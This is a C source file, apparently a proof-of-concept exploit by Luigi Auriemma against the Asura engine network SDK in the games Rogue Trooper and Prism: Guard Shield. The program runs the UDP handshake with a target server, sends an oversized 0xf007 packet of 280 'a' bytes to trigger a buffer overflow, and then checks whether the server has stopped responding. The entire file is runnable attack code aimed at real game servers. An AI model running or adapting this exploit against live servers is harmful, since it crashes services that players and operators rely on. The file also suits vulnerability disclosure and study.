/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
#endif



#define VER         "0.1"
#define PORT        3658

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



u32 asura_crc32(u8 *data, int len);
u16 asura_crc16(u8 *data, int len);
int putrn(u8 *data, int len, u32 *seed);
void fgetz(uint8_t *data, int len);
int asura_send(int sd, u16 type, u8 *data, int datalen, struct sockaddr_in *peer);
int asura_recv(int sd, u16 *type, u8 *data);
int putbb(u8 *buff, u8 chr, int len);
int putmm(u8 *buff, u8 *data, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



u16     ASURA_NDR_VERSION = 0;



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u32     n32,
            seed;
    int     sd,
            len,
            f002len = 30;
    u16     port    = PORT,
            type;
    u8      password[32],
            id[4],
            *buff,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Asura engine (network SDK) in-game buffer-overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n"
            "Note: this PoC works versus both Rogue Trooper and Prism: Guard Shield\n"
            "      it doesn't work versus online server only because is needed a specific\n"
            "      step through the Gamespy servers which I have not emulated here\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    buff = malloc(0xffff);
    if(!buff) std_err();
    seed = time(NULL);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("- get version\n");
    p = buff;
    p += putxx(p, 0,            32);
    asura_send(sd, 0xf00a, buff, p - buff, &peer);
    len = asura_recv(sd, &type, buff);
    if(len < 0) goto quit;
    printf("- ASURA_NDR_VERSION %d\n", ASURA_NDR_VERSION);

redo:
    printf("- send 0xf00a\n");
    p = buff;
    p += putxx(p, 0,            32);
    asura_send(sd, 0xf00a, buff, p - buff, &peer);
    len = asura_recv(sd, &type, buff);
    if(len < 0) goto quit;

    memcpy(id, buff, 4);

    printf("- send 0xf002\n");
    p = buff;
    p += putxx(p, ASURA_NDR_VERSION,  16);
    p += putxx(p, 0,            16);        // high version, 0 works ever
    p += putxx(p, asura_crc32(password, strlen(password)), 32);
    p += putxx(p, 0,            32);        // ???
    p += putxx(p, asura_crc32(id, 4), 32);
    p += putxx(p, f002len + 4,  32);        // fixed size packet, cannot modify!
    p += putxx(p, 0,            32);
    p += putrn(p, f002len,      &seed);     // we should use unicode but I'm lazy
    asura_send(sd, 0xf002, buff, p - buff, &peer);
    len = asura_recv(sd, &type, buff);
    if(len < 0) {
        if(f002len == 30) {
            f002len = 64;
            goto redo;
        }
        goto quit;
    }

    if(type != 0xf003) {
        getxx(buff, &n32, 32);
        if(n32 == 8) {
            printf("\n- server full\n");
            exit(1);
        } else if(n32 == 9) {
            printf("\n- server is protected with password, insert the needed keyword:\n  ");
            fgetz(password, sizeof(password));
            goto redo;
        } else if(n32 == 10) {
            printf("\nError: wrong ASURA_NDR_VERSION\n");
            exit(1);
        } else {
            printf("\nError: unknown error 0x%08x\n", n32);
            exit(1);
        }
    }

    printf("- send 0xf007\n");
    p = buff;
    p += putbb(p, 'a', 280);
    asura_send(sd, 0xf007, buff, p - buff, &peer);
    len = asura_recv(sd, &type, buff);

    close(sd);

    printf("- wait some seconds\n");
    sleep(ONESEC * 3);

    printf("- check server:\n");
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    p = buff;
    p += putxx(p, 0,            32);
    asura_send(sd, 0xf00a, buff, p - buff, &peer);
    len = asura_recv(sd, &type, buff);
    if(len < 0) {
        printf("\n  Server IS vulnerable!!!\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n");
    }

    close(sd);
    return(0);

quit:
    close(sd);
    printf("\nError: socket timeout, no reply received\n");
    return(1);
}



void fgetz(u8 *data, int len) {
    u8      *p;

    fgets(data, len, stdin);
    for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
}



int putrn(u8 *data, int len, u32 *seed) {
    u32     rnd;
    int     l,
            rem;
    u8      *p;
    static const uint8_t table[] =
            "0123456789abcdef"
            "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
            "abcdefghijklmnopqrstuvwxyz";

    rnd = *seed;
    l = rnd % len;
    if(l < 3) l = 3;
    rem = len - l;

    for(p = data; l--; p++) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        *p = table[(rnd >> 16) % (sizeof(table) - 1)];
    }
    for(; rem--; p++) {
        *p = 0;
    }

    *seed = rnd;
    return(len);
}



u32 asura_crc32(u8 *data, int len) {
    u32     crc;
    int     i;

    crc = 0x9e3779b9;
    for(i = 0; i < len; i++) {
        crc = ((crc << 5) - crc) + data[i];
    }
    return(crc);
}



u16 asura_crc16(u8 *data, int len) {
    u32     crc;

    if(len > 0x800) return(0);
    crc = asura_crc32(data, len);
    return((crc >> 16) ^ (crc & 0xffff));
}



int asura_send(int sd, u16 type, u8 *data, int datalen, struct sockaddr_in *peer) {
    int         len;
    u16         crc;
    static u8   *buff = NULL;

    if(!buff) {
        buff = malloc(0xffff);
        if(!buff) std_err();
    }

    len = 8 + datalen;
    putxx(buff,      0,       16);
    putxx(buff + 2,  0,       16);
    putxx(buff + 4,  type,    16);
    putxx(buff + 6,  ASURA_NDR_VERSION, 16);
    memcpy(buff + 8, data,    datalen);
    crc = asura_crc16(buff + 4, len - 4);
    putxx(buff + 2,  crc,     16);
    return(sendto(sd, buff, len, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)));
}



int asura_recv(int sd, u16 *type, u8 *data) {
    u32         tmp;
    int         len;
    static u8   *buff = NULL;

    if(!buff) {
        buff = malloc(0xffff);
        if(!buff) std_err();
    }

    *type = 0;
    if(timeout(sd, 3) < 0) return(-1);
    len = recvfrom(sd, buff, 0xffff, 0, NULL, NULL);
    if(len < 0) return(-1);

    getxx(buff + 4, &tmp, 16);
    *type = tmp;

    len -= 8;
    if(len < 0) return(0);

    getxx(buff + 6, &tmp, 16);
    ASURA_NDR_VERSION = tmp;

    memcpy(data, buff + 8, len);
    return(len);
}



int putbb(u8 *buff, u8 chr, int len) {
    memset(buff, chr, len);
    return(len);
}



int putmm(u8 *buff, u8 *data, int len) {
    strncpy(buff, data, len);
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;

    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }

    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;

    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }

    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


